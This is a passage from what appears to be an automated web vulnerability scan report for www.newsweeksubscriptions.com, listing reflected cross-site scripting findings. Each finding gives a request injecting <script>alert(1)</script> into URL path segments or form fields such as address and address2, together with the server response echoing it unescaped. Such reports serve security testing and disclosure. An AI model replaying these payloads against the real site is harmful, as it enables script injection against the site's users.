Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38595<script>alert(1)</script>7b1ed9f4cc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol38595<script>alert(1)</script>7b1ed9f4cc0/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:29 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol38595<script>alert(1)</script>7b1ed9f4cc0/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php is not found !</p>
...[SNIP]...

1.217. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bddaf<script>alert(1)</script>be5163b752c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.phpbddaf<script>alert(1)</script>be5163b752c HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.phpbddaf<script>alert(1)</script>be5163b752c is not found !</p>
...[SNIP]...

1.218. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8ed49<script>alert(1)</script>7bfcd9f6168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php/8ed49<script>alert(1)</script>7bfcd9f6168 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:07 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php/8ed49<script>alert(1)</script>7bfcd9f6168 is not found !</p>
...[SNIP]...

1.219. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 290be<script>alert(1)</script>d6a55c0227b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol290be<script>alert(1)</script>d6a55c0227b/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:19 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 564
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol290be<script>alert(1)</script>d6a55c0227b/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1 is not found !</p>
...[SNIP]...

1.220. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23203<script>alert(1)</script>15e2e16f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a123203<script>alert(1)</script>15e2e16f6/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:34 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 814
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a123203<script>alert(1)</script>15e2e16f6 is not found !</p>
...[SNIP]...

1.221. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23019<script>alert(1)</script>5c03cda4908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol23019<script>alert(1)</script>5c03cda4908/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol23019<script>alert(1)</script>5c03cda4908/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php is not found !</p>
...[SNIP]...

1.222. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee8b8<script>alert(1)</script>15cf6cd2e68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.phpee8b8<script>alert(1)</script>15cf6cd2e68 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:38 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.phpee8b8<script>alert(1)</script>15cf6cd2e68 is not found !</p>
...[SNIP]...

1.223. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18760<script>alert(1)</script>2fdacefe31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php/18760<script>alert(1)</script>2fdacefe31b HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 821
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php/18760<script>alert(1)</script>2fdacefe31b is not found !</p>
...[SNIP]...

1.224. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2f0a<script>alert(1)</script>0507321d56ca7bad9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrole2f0a<script>alert(1)</script>0507321d56ca7bad9/index.php?bill_state=&state= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:21 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 527
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole2f0a<script>alert(1)</script>0507321d56ca7bad9 is not found !</p>
...[SNIP]...

1.225. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e79bc<script>alert(1)</script>874d88a6ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrole79bc<script>alert(1)</script>874d88a6ba4/index.php HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 521
Connection: close
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole79bc<script>alert(1)</script>874d88a6ba4 is not found !</p>
...[SNIP]...

1.226. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 30811<script>alert(1)</script>cfd859f6c833810f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/30811<script>alert(1)</script>cfd859f6c833810f?bill_state=&state= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:51 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 779
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/30811<script>alert(1)</script>cfd859f6c833810f is not found !</p>
...[SNIP]...

1.227. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload af631<script>alert(1)</script>29e38fed55d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/af631<script>alert(1)</script>29e38fed55d HTTP/1.1
Host: www.newsweeksubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:38:23 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 774
Connection: close
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/af631<script>alert(1)</script>29e38fed55d is not found !</p>
...[SNIP]...

1.228. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the address request parameter is copied into the HTML document as plain text between tags. The payload d55cf<script>alert(1)</script>c5fd3f59eb2ff2768 was submitted in the address parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=d55cf<script>alert(1)</script>c5fd3f59eb2ff2768&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:37 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
d55cf<script>alert(1)</script>c5fd3f59eb2ff2768<br>
...[SNIP]...

1.229. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the address2 request parameter is copied into the HTML document as plain text between tags. The payload c64c8<script>alert(1)</script>4d4203c629d74c739 was submitted in the address2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=c64c8<script>alert(1)</script>4d4203c629d74c739&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:41 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20705


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
c64c8<script>alert(1)</script>4d4203c629d74c739<br>
...[SNIP]...

1.230. https://www.newsweeksubscriptions.com/FTcontrol/index.php [city parameter]

